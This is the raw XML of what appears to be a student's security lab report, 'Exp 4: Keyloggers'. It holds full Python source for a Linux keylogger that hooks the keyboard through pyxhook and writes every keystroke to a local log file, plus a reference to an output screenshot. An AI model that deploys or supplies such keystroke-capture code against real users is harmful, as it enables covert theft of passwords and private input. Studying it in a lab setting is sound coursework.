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A42E9" w14:textId="6423472D" w:rsidR="003E4833" w:rsidRDefault="003E4833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3E4833">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Exp </w:t>
      </w:r>
      <w:r w:rsidR="0082629C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="003E4833">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="0082629C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Keyloggers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFC0188" w14:textId="73EC35D6" w:rsidR="003E4833" w:rsidRPr="003E4833" w:rsidRDefault="003E4833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3E4833">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565823F1" w14:textId="77777777" w:rsidR="0082629C" w:rsidRPr="0082629C" w:rsidRDefault="0082629C" w:rsidP="008262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# Python code for keylogger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# to be used in linux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import os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import pyxhook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 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# This tells the keylogger where the log file will go.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# You can set the file path as an environment variable ('pylogger_file'),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# or use the default ~/Desktop/file.log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log_file = os.environ.get(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    'pylogger_file',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    os.path.expanduser('~/Desktop/file.log')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)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# Allow setting the cancel key from environment args, Default: `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cancel_key = ord(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    os.environ.get(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        'pylogger_cancel',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        '`'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    )[0]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)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 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# Allow clearing the log file on start, if pylogger_clean is defined.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if os.environ.get('pylogger_clean', None) is not None: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    try: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        os.remove(log_file)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    except EnvironmentError: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       # File does not exist, or no permissions.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        pass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 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#creating key pressing event and saving it into log file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def OnKeyPress(event):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    with open(log_file, 'a') as f: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        f.write('{}\n'.format(event.Key))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 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# create a hook manager object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new_hook = pyxhook.HookManager()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new_hook.KeyDown = OnKeyPress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# set the hook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new_hook.HookKeyboard()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try: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    new_hook.start()         # start the hook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except KeyboardInterrupt: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    # User cancelled from command line.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    pass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except Exception as ex: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    # Write exceptions to the log file, for analysis later.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    msg = 'Error while catching events:\n  {}'.format(ex)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lastRenderedPageBreak/>
        <w:t>    pyxhook.print_err(msg)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    with open(log_file, 'a') as f:</w:t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lang w:eastAsia="en-IN" w:bidi="ar-SA"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="0082629C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:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="en-IN" w:bidi="ar-SA"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>        f.write('\n{}'.format(msg))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D30B226" w14:textId="10AAF1FF" w:rsidR="003E4833" w:rsidRPr="00D84F11" w:rsidRDefault="003E48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1C512C" w14:textId="42A93316" w:rsidR="00D84F11" w:rsidRDefault="00D84F1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640967" w14:textId="0CBE6B48" w:rsidR="00D84F11" w:rsidRPr="0082629C" w:rsidRDefault="00D84F11" w:rsidP="00D84F1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Output</w:t>
      </w:r>
      <w:r w:rsidRPr="003E4833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14:paraId="08B4E3A0" w14:textId="0ACF4197" w:rsidR="00D84F11" w:rsidRPr="003E4833" w:rsidRDefault="0082629C" w:rsidP="00D84F11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 wp14:anchorId="4C13EC3C" wp14:editId="4D1C5300">
            <wp:extent cx="5731510" cy="5591810"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="7041269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26940" name="Picture 7041269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A4300" w14:textId="77777777" w:rsidR="00D84F11" w:rsidRPr="003E4833" w:rsidRDefault="00D84F11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84F11" w:rsidRPr="003E4833" w:rsidSect="00CA6B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43B102" w14:textId="77777777" w:rsidR="00DB56AC" w:rsidRDefault="00DB56AC" w:rsidP="003E4833">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="3DA9352D" w14:textId="77777777" w:rsidR="00DB56AC" w:rsidRDefault="00DB56AC" w:rsidP="003E4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51596E" w14:textId="77777777" w:rsidR="00362ADF" w:rsidRDefault="00362A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2D3364" w14:textId="77777777" w:rsidR="00362ADF" w:rsidRDefault="00362A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71A633" w14:textId="77777777" w:rsidR="00362ADF" w:rsidRDefault="00362A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4795DB" w14:textId="77777777" w:rsidR="00DB56AC" w:rsidRDefault="00DB56AC" w:rsidP="003E4833">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7377DDA2" w14:textId="77777777" w:rsidR="00DB56AC" w:rsidRDefault="00DB56AC" w:rsidP="003E4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C5662" w14:textId="77777777" w:rsidR="00362ADF" w:rsidRDefault="00362A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6096B4" w14:textId="77777777" w:rsidR="00362ADF" w:rsidRDefault="00362ADF" w:rsidP="00362ADF">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:rPr>
        <w:lang w:val="en-US"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t xml:space="preserve">Reg no: 210701083      </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:tab/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:tab/>
      <w:t xml:space="preserve"> Name: Hemanth Kumar D</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="11EADCEA" w14:textId="2E595D64" w:rsidR="003E4833" w:rsidRPr="00362ADF" w:rsidRDefault="003E4833" w:rsidP="00362A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7A4A6C" w14:textId="77777777" w:rsidR="00362ADF" w:rsidRDefault="00362A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833"/>
    <w:rsid w:val="00041AD1"/>
    <w:rsid w:val="001C65E2"/>
    <w:rsid w:val="00362ADF"/>
    <w:rsid w:val="003E4833"/>
    <w:rsid w:val="00463FFD"/>
    <w:rsid w:val="006B4B54"/>
    <w:rsid w:val="007042F5"/>
    <w:rsid w:val="0082629C"/>
    <w:rsid w:val="00CA6B1E"/>
    <w:rsid w:val="00D145B3"/>
    <w:rsid w:val="00D84F11"/>
    <w:rsid w:val="00DB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1675E"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{76C54483-9C84-43B5-B7CE-1D700B671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48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833"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003E48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7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 D</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-05-17T18:09:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-05-17T18:09:00Z</dcterms:modified>
</cp:coreProperties>
</file>